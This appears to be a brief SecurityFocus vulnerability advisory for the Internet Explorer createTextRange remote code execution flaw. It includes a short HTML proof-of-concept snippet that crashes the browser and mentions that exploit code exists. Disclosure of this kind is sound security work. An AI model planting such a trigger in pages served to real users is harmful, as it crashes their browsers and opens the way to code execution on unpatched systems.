Microsoft Internet Explorer CreateTextRange Remote Code Execution Vulnerability

The following HTML content demonstrates this issue by crashing the browser:

<input type="checkbox" id='c'>
<script><!--
r=document.getElementById("c");
a=r.createTextRange();
--></script>

Exploit code is available.


 

Privacy Statement
Copyright 2010, SecurityFocus